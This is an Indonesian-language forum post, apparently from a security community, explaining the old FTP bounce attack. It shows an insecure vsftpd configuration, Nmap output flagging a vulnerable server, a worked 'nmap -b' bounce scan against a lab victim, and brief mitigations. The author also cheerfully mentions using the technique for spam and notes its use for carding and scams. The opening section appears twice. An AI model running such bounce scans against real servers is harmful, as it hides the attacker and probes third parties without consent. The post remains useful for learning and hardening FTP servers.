09-04-2013, 01:07 PM
Terinspirasi dari pertanyaan pada thread http://indonesianbacktrack.or.id/forum/T...ftp-bounce maka ane coba memberikan sedikit keterangan tentang FTP Bounce Attack ...
INTRODUCTION
Ok kita coba review dikit mengenai ini , sesuai dengan judul maka serangan ini berdampak pada FTP (file transfer protocol) ~ default port - 21 dengan spesifikasi [PR85 ~ readmore and more ] . File transfer protocol (FTP) dengan spesifikasi ini menyediakan mekanisme klien untuk membangun koneksi dan mengupload file ke direktori FTP antara dua server FTP. Yup proxy ini emang sering di allowed klo-klo koneksi lem0t kyk gw apalagi kl0 Phr3ker ... CCCzero ... yah serupa dengan tunneling gitu , spec kyk gini yang diincer attacker. Nah enough untuk sedikit basic ...
beberapa konfigurasi yang menimbulkan efek (#bad_config).. contoh pada VSFTPD
POSSIBLE EFFECT
SOME EXAMPLE MOTIF
SIMULATION
NMAP allowed for scan something behind the FTP proxy .. this example for vulnerable server (gw kutip dari TS yang nanya)
RESULT : yaps server tadi vulnerable untuk dijadikan PROXY :-bd
dan jika ane bikin ujicoba secara localhost .. tentu saja dengan beda ip target , maka yang dapat dilakukan adalah ..:-
info
====
Unlucky HuH ? :-?
Jika nmap berhasil terkoneksi namun keluar output
itu tandanya server ftp sudah di hardening, hingga ftp tidak akan mengirim apapun ke port-range 0-1024. (
Kalau server FTP bener2 gk bisa jadi PROXY (alias udah di p4tcH or udah harden)
MITIGATION
Beberapa solusi yang bisa ditempuh :
1. memastikan agar server FTP tidak mengirimkan data melalui port-port TCP dibawah angka 1024 (reserved port - port cadangan untuk TCP 0 - 1023 ) minimal port 20 ~ perhatikan output nmap setelah berhasil menggunakan port 20 sebagai proxy.
2. Menggunakan password yang baik (biar kagak di brute)
3. Tidak menggunakan user standard ... (prevent user enumeration)
SWEAT MEMORY
ini adalah bug lama .. kira2 tahun 1995 gw pernah make bug ginian untuk spam email .. so this white paper just for knowledge only ...
#More Question in IRC channel
thx to all IBTeam staff & member
INTRODUCTION
Ok kita coba review dikit mengenai ini , sesuai dengan judul maka serangan ini berdampak pada FTP (file transfer protocol) ~ default port - 21 dengan spesifikasi [PR85 ~ readmore and more ] . File transfer protocol (FTP) dengan spesifikasi ini menyediakan mekanisme klien untuk membangun koneksi dan mengupload file ke direktori FTP antara dua server FTP. Yup proxy ini emang sering di allowed klo-klo koneksi lem0t kyk gw apalagi kl0 Phr3ker ... CCCzero ... yah serupa dengan tunneling gitu , spec kyk gini yang diincer attacker. Nah enough untuk sedikit basic ...
beberapa konfigurasi yang menimbulkan efek (#bad_config).. contoh pada VSFTPD
Code:
/etc/vsftpd/vsftpd.conf ...
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
connect_from_port_20=YES
POSSIBLE EFFECT
- Man In The Middle Attack
High Impact , gw uplud SMTP script (nyomot di forum luar) Trus exec then w0w ITS REALY WORK !!! :p Konsep MITM gw adopsi krn hal ini sering dipakai untuk menjadi jembatan Penyebrangan untuk menyerang The Third server krn ini dipakai untuk penyamaran IP sehingga attacker akan sulit di lacak.. Owh Bless you for this !!! ><
- Social Engineering
Yups, you are very correct ... Anonymity use this for #Carding, #Spam, #Scam and the other tricks ... wew :-
SOME EXAMPLE MOTIF
- Port Scanning
Mengelabui IDS atau beberapa monitoring device, attacker use other FTP server for scann the victim ... soo log will show the third FTP server not client (attacker) IP.
- Bypassing basic packet filtering devices
Untuk membypass beberapa rules firewall when they allowed some port access just for internal network only (LAN). exp: port 8080 cannot be access from DMZ atau external connection or via internet , namun dapat di akses pada jaringan eksternal dengan IP lokal yang telah di tentukan. kasus kek gini pernah gw dapet waktu mengadakan pentest di salah satu perusahaan CC: @mywisdom @xsan-lahci
SIMULATION
Quote:warning this just for example only
NMAP allowed for scan something behind the FTP proxy .. this example for vulnerable server (gw kutip dari TS yang nanya)
Quote:nmap -A -T5 -sS -Pn xxx.xxx.xxx.xxx
Starting Nmap 6.25 ( http://nmap.org ) at 2013-04-02 03:47 WIT
Warning: xxx.xxx.xxx.xxx giving up on port because retransmission cap hit (2).
Nmap scan report for xxx.xxx.xxx.xxx
Host is up (0.070s latency).
rDNS record for xxx.xxx.xxx.xxx
Not shown: 950 closed ports, 38 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 0 0 4096 Dec 11 2011 .
|_drwxr-xr-x 2 0 0 4096 Dec 11 2011 ..
|_ftp-bounce: bounce working!
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.13 seconds
RESULT : yaps server tadi vulnerable untuk dijadikan PROXY :-bd
dan jika ane bikin ujicoba secara localhost .. tentu saja dengan beda ip target , maka yang dapat dilakukan adalah ..:-
Quote:root@zee~# nmap -v -b anonymous:[email protected] 192.168.1.4 -P0
Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-04 11:26 WIT
Resolved ftp bounce attack proxy to 192.168.1.3 (192.168.1.3).
Attempting connection to ftp://anonymous:[email protected]:21
Connected 220 FTP server (Version 600LS) ready.
Login credentials accepted by ftp server!
Initiating TCP ftp bounce scan againts victim (192.168.1.4) at 11:26
Discoverd open port 80/tcp on 192.168.1.4
Discoverd open port 21/tcp on 192.168.1.4
Discoverd open port 4444/tcp on 192.168.1.4
Scanned 1680 ports in 14 seconds via the Bounce scan.
Host victim (192.168.1.4) appears to be up ... good.
Interisting ports on victiom (192.168.1.4):
Not shown: 1677 closed ports
PORT STATE SERVICE
80/tcp open httpd
21/tcp open ftp
Nmap finished: 1 IP_address (1 host up) scanned in 22.317 seconds
info
====
Code:
username ftp semisal : anonymous
password : anonpass
ftp bounce server : 192.168.1.3
victim/target : 192.168.1.4
-P0 memerintahkan agar nmap tidak melakukan ping ke victim.
Unlucky HuH ? :-?
Jika nmap berhasil terkoneksi namun keluar output
Quote:“Your ftp bounce server doesn't allow privileged ports, skipping them.”
itu tandanya server ftp sudah di hardening, hingga ftp tidak akan mengirim apapun ke port-range 0-1024. (
Quote:Your ftp bounce server sucks, it won't let us feed bogus ports!
Kalau server FTP bener2 gk bisa jadi PROXY (alias udah di p4tcH or udah harden)
MITIGATION
Beberapa solusi yang bisa ditempuh :
1. memastikan agar server FTP tidak mengirimkan data melalui port-port TCP dibawah angka 1024 (reserved port - port cadangan untuk TCP 0 - 1023 ) minimal port 20 ~ perhatikan output nmap setelah berhasil menggunakan port 20 sebagai proxy.
2. Menggunakan password yang baik (biar kagak di brute)
3. Tidak menggunakan user standard ... (prevent user enumeration)
SWEAT MEMORY
ini adalah bug lama .. kira2 tahun 1995 gw pernah make bug ginian untuk spam email .. so this white paper just for knowledge only ...
#More Question in IRC channel
thx to all IBTeam staff & member
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only